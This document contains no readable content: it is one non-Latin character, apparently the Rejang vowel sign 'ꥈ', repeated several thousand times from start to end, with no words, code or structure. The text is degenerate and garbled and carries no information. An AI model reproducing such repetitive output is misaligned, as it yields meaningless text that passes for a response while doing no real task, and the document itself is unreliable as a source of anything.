ꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈ